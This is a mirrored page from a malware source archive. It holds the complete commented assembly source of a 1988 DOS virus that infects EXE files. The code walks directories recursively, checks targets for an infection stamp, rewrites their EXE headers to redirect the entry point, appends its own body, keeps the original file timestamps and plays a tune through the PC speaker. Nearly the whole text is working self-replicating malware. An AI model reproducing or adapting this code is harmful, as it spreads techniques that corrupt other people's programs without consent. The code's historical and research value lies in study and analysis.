mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
1129 lines
18 KiB
NASM
1129 lines
18 KiB
NASM
.MODEL SMALL
|
||
.CODE
|
||
|
||
comment /
|
||
Good luck!
|
||
|
||
Vladimir Botchev, CICT-BAS, december 1988
|
||
|
||
/
|
||
|
||
data_area struc ;Define a pattern for working data
|
||
;area
|
||
DS_save dw ?
|
||
ES_save dw ?
|
||
IP_save dw ?
|
||
CS_save dw ?
|
||
SS_save dw ?
|
||
filematch db '*.exe',00h ;Names for files to infect
|
||
matchall db '*.*',00h ;needed for the matching procedure
|
||
infected dw 00h ;A very useful flag
|
||
help_flag dw 00h ;These two flags are needed to
|
||
where_from_flag dw 00h ;determine if virus is free running
|
||
;or from an infected program
|
||
;therefore it's very important
|
||
;that where_from_flag value
|
||
;is set to zero at assembly time
|
||
handle dw ?
|
||
ip_old dw ? ;old instruction pointer
|
||
cs_old dw ? ;old value of code segment
|
||
ss_old dw ?
|
||
far_push dw ?
|
||
save_push dw ?
|
||
buffer1 db '\',63 dup (?)
|
||
virus_stamp db 'motherfucker' ;Very hard to obtain in
|
||
;a random way
|
||
|
||
buffer2 db 2b0h dup (?)
|
||
new_area db 64 dup (?)
|
||
new_data db 64 dup (?)
|
||
pointer1 dw ?
|
||
pointer2 dw ?
|
||
pointer3 dw ?
|
||
pointer4 dw ?
|
||
pointer5 dw ?
|
||
pointer6 dw ?
|
||
pointer7 dw ?
|
||
pointer8 dw ?
|
||
|
||
data_area ends
|
||
|
||
org 100h ;Defined for .com file as virus must
|
||
;be able to run on itself
|
||
start: call setup_data ;This is a near call therefore it's a
|
||
;three byte instruction.It's purpose is
|
||
;to catch correct data area address
|
||
;even when virus is appended to the
|
||
;infected .exe program
|
||
adjust equ offset pgm_start ;Known offset value
|
||
pgm_start label word ;
|
||
|
||
virussize equ 2793
|
||
|
||
work: mov ax,ds ;Save old DS
|
||
push cs
|
||
pop ds ;Update to needed DS value
|
||
mov si,offset buffer.DS_save ;Put old DS in a quiet place
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax
|
||
|
||
mov si,offset buffer.ES_save ;Save it because Get DTA side effects
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,es
|
||
mov [si],ax
|
||
push cs ;Imperative because DI usage
|
||
pop es
|
||
|
||
push bx ;It's imperative to always keep
|
||
;this value unchanged
|
||
mov ax,2f00h ;Get DTA function call
|
||
int 21h
|
||
|
||
mov cx,bx ;save address found
|
||
pop bx
|
||
mov si,offset buffer.pointer1
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],cx
|
||
add si,2 ;Locate the segment immediately above
|
||
mov ax,es
|
||
mov [si],ax
|
||
push cs
|
||
pop es
|
||
|
||
mov di,offset buffer.buffer1 ;adjust for first search
|
||
inc di ;Jump over the '\'
|
||
sub di,adjust
|
||
add di,bx
|
||
mov dx,0000h
|
||
push bx
|
||
call search_exe
|
||
pop bx
|
||
mov si,offset buffer.where_from_flag
|
||
sub si,adjust
|
||
add si,bx
|
||
cmp word ptr [si],0000h
|
||
jnz infected_run
|
||
int 020H
|
||
|
||
infected_run:
|
||
mov si,offset buffer.pointer1
|
||
sub si,adjust
|
||
add si,bx
|
||
mov dx,[si]
|
||
push ds
|
||
mov ax,[si+2]
|
||
mov ds,ax
|
||
push bx
|
||
mov ax,1a00h
|
||
int 21h
|
||
pop bx
|
||
pop ds ;Restore original DTA
|
||
|
||
mov si,offset buffer.ES_save
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov es,ax ;Restore ES
|
||
|
||
;Here you can do whatever you want
|
||
|
||
push bx
|
||
call mary_proc
|
||
pop bx
|
||
|
||
|
||
|
||
mov si,offset buffer.IP_save
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov dx,[si+2]
|
||
mov si,offset buffer.far_push ;Restore original code
|
||
sub si,adjust ;segment
|
||
add si,bx
|
||
mov cx,[si]
|
||
push ax
|
||
mov ax,cs
|
||
sub ax,cx
|
||
mov di,ax ;For stack
|
||
add dx,ax
|
||
pop ax
|
||
|
||
mov si,offset buffer.SS_save
|
||
sub si,adjust ;Restore stack segment
|
||
add si,bx
|
||
mov cx,word ptr [si]
|
||
add cx,di
|
||
|
||
push es
|
||
pop ds
|
||
|
||
cli
|
||
mov ss,cx
|
||
sti
|
||
|
||
|
||
push dx
|
||
push ax
|
||
retf
|
||
|
||
|
||
search_exe PROC
|
||
|
||
push si
|
||
push dx
|
||
call transfer_filespec ;transfer filename in another
|
||
;working area
|
||
call find_first ;try to find a first match
|
||
jc not_here ;first match not found
|
||
call try_to_infect ;if found try to infect
|
||
;infected != 0 if success
|
||
mov si,offset buffer.infected
|
||
sub si,adjust
|
||
add si,bx
|
||
test word ptr [si],0ffffh
|
||
jz try_next
|
||
jmp quiet_exit
|
||
|
||
try_next:
|
||
call find_next ;If infection was not succesful
|
||
;try once more
|
||
jc not_here
|
||
|
||
call try_to_infect ;If match found try to infect
|
||
mov si,offset buffer.infected ;again
|
||
sub si,adjust
|
||
add si,bx
|
||
test word ptr [si],0ffffh
|
||
jz try_next
|
||
|
||
jmp quiet_exit ;quiet exit simply jumps
|
||
;to a return instruction
|
||
not_here:
|
||
pop dx ;If first searches are
|
||
push dx ;unsuccesful try a '*.*' match
|
||
call search_all
|
||
call find_first
|
||
jnc attribute_test ;i.e. expect probably to
|
||
;find a subdirectory
|
||
quiet_exit:
|
||
pop dx
|
||
pop si
|
||
ret
|
||
|
||
attribute_test:
|
||
mov si,dx ;offset of DTA
|
||
test byte ptr [si+015h],010h ;where attribute byte is to
|
||
;be found.Try first with
|
||
;subdirectory attribute
|
||
jne dir_found ;subdirectory found
|
||
more_tries:
|
||
call find_next ;Since the search was initiated
|
||
;with '*.*' if this is not a
|
||
;directory try to found one
|
||
jc quiet_exit ;No sense to search more
|
||
|
||
test byte ptr [si+015h],010h
|
||
jz more_tries ;Search to the end
|
||
dir_found:
|
||
cmp byte ptr [si+01Eh],02Eh ;Compare with the subdirectory
|
||
;mark '.'
|
||
jz more_tries ;looking for files no
|
||
;subdirectories
|
||
|
||
call dta_compute ;Valid entry, now set some DTA
|
||
;and continue to search
|
||
push ax
|
||
mov ah,01Ah ;Set DTA function call
|
||
int 021h
|
||
pop ax
|
||
push si
|
||
mov si,offset buffer.infected
|
||
sub si,adjust
|
||
add si,bx
|
||
test word ptr [si],0ffffh
|
||
pop si
|
||
jnz quiet_exit
|
||
|
||
jmp more_tries
|
||
|
||
|
||
search_exe ENDP
|
||
|
||
dta_compute PROC
|
||
|
||
push di ;Save some registers
|
||
push si
|
||
push ax
|
||
push bx
|
||
cld ;Up count for SI,DI pair
|
||
mov si,dx ;DTA address to SI
|
||
add si,01EH ;and add subdirectory
|
||
;name offset
|
||
|
||
store_loop:
|
||
lodsb
|
||
stosb
|
||
or al,al
|
||
jne store_loop ;store loop
|
||
|
||
std
|
||
stosb
|
||
mov al,05Ch ;Put in place the path name
|
||
;constructor
|
||
|
||
stosb
|
||
add di,2 ;Adjust di for new searches
|
||
call search_exe ;
|
||
;a heavily recursion
|
||
;
|
||
pop bx ;some cleanup and exit
|
||
;
|
||
pop ax
|
||
pop si
|
||
pop di
|
||
ret
|
||
|
||
dta_compute ENDP
|
||
|
||
try_to_infect PROC
|
||
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
|
||
push es
|
||
push bx
|
||
mov ax,2f00h ;Get DTA function call
|
||
int 21h
|
||
mov ax,bx
|
||
pop bx
|
||
mov si,offset buffer.pointer3
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax ;Offset saved
|
||
add si,2
|
||
mov ax,es
|
||
mov [si],ax
|
||
pop es ;Segment located just above
|
||
|
||
mov dx,offset buffer.new_data
|
||
sub dx,adjust
|
||
add dx,bx
|
||
push bx
|
||
mov ax,1a00h
|
||
int 21h ;Set DTA function call
|
||
pop bx ;It's very important to
|
||
;save BX in all calls
|
||
|
||
mov di,offset buffer.new_area
|
||
mov si,offset buffer.buffer1
|
||
sub di,adjust
|
||
sub si,adjust
|
||
add di,bx
|
||
add si,bx
|
||
|
||
cld ;Move previously found path-
|
||
;name or filename to new
|
||
;data area
|
||
move_path:
|
||
lodsb
|
||
stosb
|
||
or al,al
|
||
jnz move_path
|
||
std ;adjust DI to recieve
|
||
mov al,'\' ;filename.
|
||
mov cx,0040h
|
||
std ;Search backward
|
||
repne scasb
|
||
|
||
mov si,offset buffer.pointer3
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov si,ax
|
||
add di,2
|
||
|
||
o_kay:
|
||
add si,001eh ;The beginning of the
|
||
;filename...
|
||
cld ;Now move name
|
||
|
||
move_fnm:
|
||
lodsb
|
||
stosb
|
||
or al,al
|
||
jnz move_fnm
|
||
|
||
push dx
|
||
push bx
|
||
mov dx,offset buffer.new_area
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov ax,3d02h ;Open file with handle
|
||
;for read/write
|
||
int 21h
|
||
pop bx
|
||
pop dx
|
||
jnc go_ahead ;In case file cannot be opened
|
||
jmp error_exit
|
||
|
||
go_ahead:
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax ;Save handle
|
||
|
||
push bx
|
||
mov bx,ax ;Prepare for lseek
|
||
push dx
|
||
mov cx,0000h ;Look at the end of the file
|
||
mov dx,0000h ;Offset of -12 from the end
|
||
;of the file
|
||
mov ax,4202h ;Lseek function call
|
||
int 21h
|
||
mov cx,dx
|
||
pop dx
|
||
pop bx
|
||
jnc compute_length
|
||
jmp close_error
|
||
|
||
compute_length:
|
||
|
||
sub ax,000ch
|
||
sbb cx,0000h ;Exact position
|
||
|
||
|
||
save_offset: ;
|
||
mov si,offset buffer.pointer5
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax
|
||
add si,2
|
||
mov [si],cx
|
||
|
||
push bx
|
||
push dx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
mov dx,ax
|
||
mov ax,4200h ;From beginning of file
|
||
int 21h ;Lseek function call
|
||
pop dx
|
||
pop bx
|
||
jnc set_buffer
|
||
jmp close_error
|
||
|
||
set_buffer:
|
||
push bx
|
||
push dx
|
||
mov dx,offset buffer.new_data
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si] ;Load handle
|
||
mov cx,000ch
|
||
mov ax,3f00h
|
||
int 21h ;Read function call
|
||
pop dx
|
||
pop bx
|
||
jnc read_ok
|
||
jmp close_error
|
||
|
||
read_ok:
|
||
mov si,offset buffer.virus_stamp
|
||
mov di,offset buffer.new_data
|
||
sub si,adjust
|
||
sub di,adjust
|
||
add si,bx
|
||
add di,bx
|
||
mov cx,12 ;Length of strings to
|
||
;compare
|
||
repe cmpsb
|
||
pushf
|
||
mov si,offset buffer.infected
|
||
sub si,adjust
|
||
add si,bx
|
||
mov word ptr [si],0000h
|
||
popf
|
||
jnz infect_it
|
||
|
||
close_error:
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
push bx
|
||
mov bx,[si]
|
||
mov ax,3e00h ;Close file function call
|
||
int 21h
|
||
pop bx
|
||
jmp error_exit
|
||
|
||
infect_it:
|
||
mov si,offset buffer.infected
|
||
sub si,adjust
|
||
add si,bx
|
||
mov word ptr [si],7777h
|
||
|
||
mov si,offset buffer.where_from_flag
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
sub si,2
|
||
mov [si],ax ;This code effectively moves
|
||
;where_from_flag into help_flag
|
||
|
||
add si,2
|
||
mov [si],5a5ah ;Ready to infect
|
||
push bx
|
||
push dx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4200h ;From beginning of file
|
||
int 21h ;Lseek function call
|
||
pop dx
|
||
pop bx
|
||
jnc set_new_data
|
||
jmp append_ok
|
||
|
||
set_new_data:
|
||
push bx
|
||
push dx
|
||
mov dx,offset buffer.new_data
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si] ;Load handle
|
||
mov cx,001bh ;Read formatted exe header
|
||
mov ax,3f00h
|
||
int 21h ;Read function call
|
||
pop dx
|
||
pop bx
|
||
jnc read_header
|
||
jmp append_ok
|
||
|
||
read_header:
|
||
nop ;some code to modify header
|
||
;
|
||
|
||
mov si,offset buffer.pointer5
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
add si,2
|
||
add ax,0ch
|
||
adc word ptr [si],0000h
|
||
sub si,2
|
||
mov [si],ax ;This code restores original
|
||
;filelength
|
||
|
||
mov si,offset buffer.new_data
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
cmp ax,5a4dh ;check for valid exe file
|
||
jz valid_exe
|
||
jmp append_ok
|
||
|
||
valid_exe:
|
||
mov ax,[si+8] ;Load module size
|
||
xor dx,dx
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1 ;Multiply by 16
|
||
|
||
push ax
|
||
push dx ;Adjust new size
|
||
push cx
|
||
mov dx,virussize-896+64
|
||
push dx
|
||
mov cx,0009h
|
||
shr dx,cl
|
||
add word ptr [si+4],dx
|
||
pop dx
|
||
and dx,01ffh
|
||
add dx,word ptr [si+2]
|
||
cmp dx,512
|
||
jl adjust_okay
|
||
sub dx,512
|
||
inc word ptr [si+4]
|
||
adjust_okay:
|
||
mov word ptr [si+2],dx
|
||
pop cx
|
||
pop dx
|
||
pop ax
|
||
|
||
|
||
push si ;This SI is very useful so save it
|
||
|
||
mov si,offset buffer.pointer5
|
||
sub si,adjust
|
||
add si,bx
|
||
sub [si],ax
|
||
mov ax,[si]
|
||
sbb [si+2],dx
|
||
mov dx,[si+2] ;the byte size of the load module
|
||
|
||
|
||
pop si
|
||
push ax
|
||
push dx
|
||
mov ax,[si+14h]
|
||
mov dx,[si+16h] ;Get CS:IP value
|
||
mov cx,[si+0eh] ;Get SS value
|
||
push si
|
||
mov si,offset buffer.IP_save
|
||
sub si,adjust
|
||
add si,bx
|
||
xchg [si],ax
|
||
xchg [si+2],dx
|
||
mov si,offset buffer.SS_save
|
||
sub si,adjust
|
||
add si,bx
|
||
xchg [si],cx
|
||
mov si,offset buffer.ip_old
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax
|
||
mov [si+2],dx
|
||
mov si,offset buffer.ss_old
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],cx
|
||
pop si
|
||
pop dx
|
||
pop ax
|
||
|
||
push ax
|
||
push dx
|
||
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1 ;Multiply by 16
|
||
|
||
mov cx,0008h
|
||
shl dx,cl
|
||
mov cx,0004h
|
||
shr ax,cl ;A very obscure algorithm to make
|
||
;a segment:offset pair
|
||
mov [si+14h],ax
|
||
mov [si+16h],dx ;Infected values
|
||
|
||
push si
|
||
mov si,offset buffer.far_push
|
||
sub si,adjust
|
||
add si,bx
|
||
xchg [si],dx
|
||
mov word ptr [si+2],dx
|
||
pop si
|
||
|
||
pop dx
|
||
pop ax
|
||
add ax,virussize ;
|
||
adc dx,0000h
|
||
|
||
mov cx,0003h
|
||
mul_loop:
|
||
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1
|
||
shl ax,1
|
||
rcl dx,1 ;Multiply by 4096
|
||
loop mul_loop
|
||
|
||
or ax,ax
|
||
jz exact_value
|
||
inc dx
|
||
exact_value:
|
||
mov [si+0eh],dx ;Infected stack segment
|
||
|
||
;Write back infected header
|
||
push si
|
||
push bx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
mov ax,5700h ;Get time function
|
||
int 21h
|
||
pop bx
|
||
pop si
|
||
jnc correct_time
|
||
jmp append_ok1
|
||
|
||
correct_time:
|
||
push cx
|
||
push bx
|
||
push dx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4200h ;From beginning of file
|
||
int 21h ;Lseek function call
|
||
pop dx
|
||
pop bx
|
||
pop cx
|
||
jnc continue_infection
|
||
jmp append_ok1
|
||
|
||
continue_infection:
|
||
|
||
push cx
|
||
push dx
|
||
push bx
|
||
mov dx,offset buffer.new_data
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si] ;Load handle
|
||
mov cx,001bh ;Write infected exe header
|
||
mov ax,4000h
|
||
int 21h ;Write function call
|
||
pop bx
|
||
pop dx
|
||
pop cx
|
||
jnc glue_virus
|
||
jmp append_ok1
|
||
|
||
glue_virus:
|
||
|
||
push cx
|
||
push bx
|
||
push dx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4202h ;From the end of file
|
||
int 21h ;Lseek function call
|
||
pop dx
|
||
pop bx
|
||
pop cx
|
||
jnc write_data
|
||
jmp append_ok1
|
||
|
||
write_data:
|
||
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
|
||
push dx
|
||
push cx
|
||
|
||
mov dx,bx
|
||
sub dx,3 ;The starting three byte
|
||
;call instruction
|
||
push es
|
||
push bx
|
||
push dx
|
||
push si
|
||
mov ax,2f00h
|
||
int 21h
|
||
pop si
|
||
pop dx
|
||
|
||
push es
|
||
push bx
|
||
|
||
push si
|
||
mov ax,1a00h
|
||
int 21h
|
||
pop si
|
||
|
||
|
||
mov bx,[si] ;Load handle
|
||
mov cx,virussize-896+64 ;Length of virus obtained
|
||
mov ax,4000h ;with dir
|
||
int 21h
|
||
lahf ;Write function call
|
||
|
||
pop bx
|
||
pop es
|
||
|
||
push ds
|
||
push es
|
||
pop ds
|
||
mov dx,bx
|
||
push ax
|
||
mov ax,1a00h
|
||
int 21h
|
||
pop ax
|
||
|
||
pop ds
|
||
pop bx
|
||
pop es
|
||
|
||
pop cx
|
||
pop dx
|
||
|
||
sahf
|
||
jnc put_stamp ;Error or not file
|
||
jmp append_ok1 ;is closed
|
||
|
||
put_stamp:
|
||
push bx
|
||
mov si,offset buffer.handle
|
||
sub si,adjust
|
||
add si,bx
|
||
mov bx,[si]
|
||
mov ax,5701h ;Set time function
|
||
int 21h
|
||
pop bx
|
||
|
||
append_ok1:
|
||
|
||
mov si,offset buffer.ip_old ;Restore previous CS:IP values
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov dx,[si+2]
|
||
mov si,offset buffer.IP_save
|
||
sub si,adjust
|
||
add si,bx
|
||
mov [si],ax
|
||
mov [si+2],dx
|
||
|
||
mov si,offset buffer.save_push
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov word ptr [si-2],ax
|
||
|
||
mov si,offset buffer.ss_old
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
mov si,offset buffer.SS_save
|
||
sub si,adjust
|
||
add si,bx
|
||
mov word ptr [si],ax
|
||
|
||
|
||
append_ok:
|
||
mov si,offset buffer.help_flag
|
||
sub si,adjust
|
||
add si,bx
|
||
mov ax,[si]
|
||
add si,2
|
||
mov [si],ax ;This code effectively moves
|
||
;help_flag into where_from_flag
|
||
|
||
|
||
jmp close_error ;
|
||
|
||
error_exit:
|
||
mov si,offset buffer.pointer3
|
||
sub si,adjust
|
||
add si,bx
|
||
mov dx,[si] ;Restore original DTA
|
||
add si,2
|
||
mov ax,[si]
|
||
push ds
|
||
mov ds,ax
|
||
mov ax,1a00h ;Set DTA function call
|
||
int 21h
|
||
pop ds
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
|
||
try_to_infect ENDP
|
||
|
||
transfer_filespec PROC
|
||
|
||
push si
|
||
mov si,offset buffer.filematch ;Transfer name to the working
|
||
;area
|
||
sub si,adjust
|
||
add si,bx
|
||
call byte_move
|
||
pop si
|
||
ret
|
||
|
||
transfer_filespec ENDP
|
||
|
||
search_all PROC
|
||
|
||
push si
|
||
mov si,offset buffer.matchall ;This is the '*.*' filename
|
||
sub si,adjust
|
||
add si,bx
|
||
call byte_move
|
||
pop si
|
||
ret
|
||
|
||
search_all ENDP
|
||
|
||
byte_move PROC
|
||
|
||
push ax
|
||
push di
|
||
|
||
cld
|
||
|
||
move_loop:
|
||
lodsb
|
||
stosb
|
||
or al,al ;The string to move is ASCIIZ
|
||
jne move_loop
|
||
pop di
|
||
pop ax
|
||
ret
|
||
|
||
byte_move ENDP
|
||
|
||
find_first PROC
|
||
|
||
push cx
|
||
push bx
|
||
cmp dx,0000h
|
||
jnbe over_set
|
||
mov dx,offset buffer.buffer2 ;Set Data Transfer Area
|
||
sub dx,adjust ;or Disk Transfer area
|
||
add dx,bx ;
|
||
over_set:
|
||
add dx,02Bh
|
||
mov cx,00010h ;Attribute byte for
|
||
;directory search
|
||
mov ah,01ah
|
||
int 021h ;Set DTA function call
|
||
|
||
pop bx
|
||
push bx
|
||
push dx
|
||
mov dx,offset buffer.buffer1
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov ah,04eh ;find first
|
||
;function call
|
||
int 021h
|
||
pop dx
|
||
pop bx
|
||
pop cx
|
||
ret
|
||
|
||
find_first ENDP
|
||
|
||
find_next PROC
|
||
|
||
push cx
|
||
push bx
|
||
push dx
|
||
mov dx,offset buffer.buffer1
|
||
sub dx,adjust
|
||
add dx,bx
|
||
mov cx,00010h
|
||
mov ah,04fh ;Find next function call
|
||
int 021h
|
||
pop dx
|
||
pop bx
|
||
pop cx
|
||
ret
|
||
|
||
find_next ENDP
|
||
|
||
delay PROC
|
||
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
mov ah,2ch ;Read current time
|
||
int 21h
|
||
|
||
mov ah,ch
|
||
add al,cl
|
||
add bh,dh
|
||
add bl,dl
|
||
|
||
cmp bl,100
|
||
jb secs
|
||
sub bl,100
|
||
inc bh
|
||
secs: cmp bh,60
|
||
jb mins
|
||
sub bh,60
|
||
inc al
|
||
mins: cmp al,60
|
||
jb hours
|
||
sub al,60
|
||
inc ah
|
||
hours: cmp ah,24
|
||
jne tcheck
|
||
sub ah,ah
|
||
|
||
tcheck: push ax
|
||
mov ah,2ch
|
||
int 21h
|
||
|
||
pop ax
|
||
cmp cx,ax
|
||
ja tdquit
|
||
jb tcheck
|
||
cmp dx,bx
|
||
jb tcheck
|
||
|
||
tdquit: pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
|
||
delay ENDP
|
||
|
||
sound PROC
|
||
|
||
push ax
|
||
push cx
|
||
push dx
|
||
push di
|
||
|
||
mov al,0b6h
|
||
out 43h,al
|
||
mov dx,14h
|
||
mov ax,533h*896
|
||
div di
|
||
out 42h,al
|
||
mov al,ah
|
||
out 42h,al
|
||
in al,61h
|
||
mov ah,al
|
||
or al,3
|
||
out 61h,al
|
||
mov al,cl
|
||
call delay
|
||
mov al,ah
|
||
out 61h,al
|
||
pop di
|
||
pop dx
|
||
pop cx
|
||
pop ax
|
||
ret
|
||
|
||
sound ENDP
|
||
|
||
music_play PROC
|
||
|
||
push bx
|
||
push cx
|
||
push di
|
||
push si
|
||
push bp
|
||
|
||
freq:
|
||
|
||
mov di,[si]
|
||
cmp di,0ffffh
|
||
je end_play
|
||
mov bl,ds:[bp]
|
||
sub cl,cl
|
||
sub bh,bh
|
||
call sound
|
||
add si,2
|
||
inc bp
|
||
jnz freq
|
||
|
||
end_play:
|
||
pop bp
|
||
pop si
|
||
pop di
|
||
pop cx
|
||
pop bx
|
||
ret
|
||
|
||
music_play ENDP
|
||
|
||
mary_proc PROC
|
||
|
||
push bx
|
||
push bp
|
||
|
||
mov si,offset mary_freq
|
||
mov bp,offset mary_time
|
||
sub si,adjust
|
||
sub bp,adjust
|
||
add si,bx
|
||
add bp,bx
|
||
call music_play
|
||
|
||
pop bp
|
||
pop bx
|
||
ret
|
||
|
||
mary_proc ENDP
|
||
|
||
mary_freq dw 262,262,293,329,262,329,293,196
|
||
dw 262,262,293,329,262,262
|
||
dw 262,262,293,329,349,329,293,262
|
||
dw 246,196,220,246,262,262
|
||
dw 220,246,220,174,220,246,262,220
|
||
dw 196,220,196,174,164,174,196
|
||
dw 220,246,220,174,220,246,262,220
|
||
dw 196,262,246,293,262,262,0ffffh
|
||
|
||
|
||
mary_time db 8 dup(25)
|
||
db 4 dup(25), 50, 50
|
||
db 8 dup(25)
|
||
db 4 dup(25), 50, 50
|
||
db 26, 25, 26, 5 dup(25)
|
||
db 26, 25, 26, 3 dup(25), 30
|
||
db 26, 25, 26, 4 dup(25), 30
|
||
db 4 dup(25), 50, 50
|
||
|
||
|
||
|
||
setup_data:
|
||
cli
|
||
pop bx ;This will catch instruction pointer
|
||
push bx
|
||
sti ;value and after that restore stack
|
||
ret ;pointer value
|
||
|
||
|
||
buffer data_area <> ;Reseve data_area space
|
||
|
||
|
||
END start |